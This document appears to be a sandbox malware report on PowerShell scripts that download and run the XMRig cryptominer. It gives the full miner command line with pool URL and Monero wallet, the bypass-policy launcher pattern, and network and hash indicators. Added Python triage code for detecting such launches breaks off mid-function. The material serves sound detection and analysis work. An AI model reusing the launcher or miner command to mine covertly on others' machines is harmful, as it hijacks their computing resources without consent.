memory/5032-127-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-128-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-129-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-130-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-131-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-132-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-133-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-134-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-135-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-136-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-137-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-138-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-139-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-140-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-141-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-142-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-143-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-144-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-145-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-146-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-147-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-148-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-149-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-150-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-151-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-152-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-153-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-154-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-155-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-156-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:34

Platform

win11-20240426-en

Max time kernel

1796s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical matches, no further details recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5ehwqug.uuv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:25

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4kwxmzxl.552.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:34

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1742s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xddr0ppr.n5w.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:53

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1780s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bciho5vh.t3t.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


memory/3532-104-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-105-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-106-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-107-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-108-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-109-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-110-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-111-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-112-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-113-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-114-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-115-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-116-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-117-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-118-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:33

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 matches; the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
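The two command lines above carry everything a responder needs as indicators: the pool URL, the coin prefix, the wallet, the worker name and the algorithm, plus the launcher pattern (PowerShell with `-ExecutionPolicy bypass` running a script from the user's Temp directory). The following Python is an added example written for this page, not code from the sandbox or from the XMRig project. It tokenizes Windows command lines, maps XMRig's `-a/-o/-u/-p` flags (and their `--long` forms) to fields, and emits a finding per miner or launcher. The sample lines are constructed: two are copied from the Processes section above, two are benign filler. The flag map, the stratum scheme list, the RandomX algorithm names, the Monero-address heuristic and the finding field names are this example's own assumptions.

```python
"""Miner-launch triage over process command lines (added example, not sandbox code)."""
import re
from urllib.parse import urlsplit

# Constructed sample input: two lines copied from the report's Processes section,
# two benign lines to show the filter is selective.
SAMPLE_CMDLINES = [
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"',
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 '
    r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x',
    r'notepad.exe C:\Users\Admin\notes.txt',                 # benign filler
    r'"C:\Program Files\Git\cmd\git.exe" fetch -p origin',   # benign: "-p" here is not a miner flag
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')   # a double-quoted token (may contain spaces) or a bare word
# Assumed flag map: XMRig's short/long option names mapped to field names used by this example.
MINER_FLAGS = {"-a": "algo", "--algo": "algo", "-o": "pool", "--url": "pool",
               "-u": "user", "--user": "user", "-p": "password", "--pass": "password"}
STRATUM_SCHEMES = {"stratum", "stratum+tcp", "stratum+ssl", "stratum2+tcp", "stratum2+ssl"}
RANDOMX_ALGOS = {"rx", "rx/0", "randomx"}
# Heuristic (assumption): a Monero mainnet address is 95 base58 characters starting with '4'.
XMR_ADDR_RE = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def parse_flags(tokens):
    """Map known miner flags (short, long, and --long=value) to their values."""
    found, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--") and "=" in tok:
            key, val = tok.split("=", 1)
            if key in MINER_FLAGS:
                found[MINER_FLAGS[key]] = val
        elif tok in MINER_FLAGS and i + 1 < len(tokens):
            found[MINER_FLAGS[tok]] = tokens[i + 1]
            i += 1
        i += 1
    return found


def analyse(cmdline):
    """Return a finding dict for a miner or its launcher, or None for anything else."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    exe = tokens[0].rsplit("\\", 1)[-1].lower()
    finding = {"exe": exe, "reasons": []}
    flags = parse_flags(tokens)

    pool = flags.get("pool")
    if pool:
        url = urlsplit(pool)   # urlsplit parses the netloc for any scheme followed by "//"
        if url.scheme.lower() in STRATUM_SCHEMES:
            finding.update(pool_host=url.hostname, pool_port=url.port,
                           pool_tls=url.scheme.lower().endswith("ssl"))
            finding["reasons"].append("stratum pool URL")

    user = flags.get("user")
    if user:
        # Convention visible in the report's -u value: COIN:wallet.worker
        coin, _, rest = user.rpartition(":")
        wallet, _, worker = rest.partition(".")
        finding.update(coin=coin or None, wallet=wallet, worker=worker or None)
        if XMR_ADDR_RE.fullmatch(wallet):
            finding["reasons"].append("Monero address in -u")

    if flags.get("algo", "").lower() in RANDOMX_ALGOS:
        finding["algo"] = flags["algo"]
        finding["reasons"].append("RandomX algorithm selected")

    lowered = cmdline.lower()
    if exe in {"powershell.exe", "pwsh.exe"} and "-executionpolicy" in lowered and "bypass" in lowered:
        finding["reasons"].append("PowerShell launched with ExecutionPolicy bypass")
        if "\\appdata\\local\\temp\\" in lowered:
            finding["reasons"].append("script path under user Temp")

    return finding if finding["reasons"] else None


def triage(cmdlines):
    """Run analyse() over a batch of command lines and keep only the findings."""
    return [f for f in map(analyse, cmdlines) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES):
        print(finding)
```

Two practitioner notes on the surrounding signatures. The `SeLockMemoryPrivilege` entries under "Suspicious use of AdjustPrivilegeToken" are what XMRig asks for when it tries to back the RandomX dataset with large pages; on its own that privilege request is a useful miner tell but it is not exploitation. The `__PSScriptPolicyTest_*.ps1` file listed under Files is created by PowerShell itself at startup to probe whether an AppLocker or WDAC script policy is enforced; it is not a dropped payload, so do not hunt on its hash.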

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp
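The Network table mixes four different things: resolver queries to 8.8.8.8, reverse (PTR) lookups of contacted peers, the two-stage download from github.com and objects.githubusercontent.com, and the actual mining session to rx.unmineable.com. Because the pool is reached over `stratum+ssl` on port 443, a port-based egress rule sees it as ordinary HTTPS; the name (DNS answer or TLS SNI) is what separates it. The following Python is an added example for this page, not part of the sandbox report: it parses rows in the report's "Country Destination Domain Proto" layout (including rows where the domain column is empty, as in the later detonations), drops PTR noise, and buckets the rest. The sample rows are copied from this report's Network tables; the three domain watchlists are assumptions for the example, not a vendor feed.

```python
"""Network-table triage for sandbox rows (added example, not sandbox code)."""

# Constructed sample: rows copied from the report's Network tables, header included,
# in the "Country Destination Domain Proto" layout (the domain column may be empty).
SAMPLE_ROWS = """\
Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.11:443 tcp
"""

# Assumed watchlists for this example only.
POOL_SUFFIXES = ("unmineable.com",)
STAGING_SUFFIXES = ("github.com", "githubusercontent.com")
BACKGROUND_SUFFIXES = ("bing.com",)   # Windows/sandbox background chatter


def parse_rows(text):
    """Parse report rows into dicts; the header and malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) not in (3, 4):
            continue
        ip, _, port = parts[1].rpartition(":")
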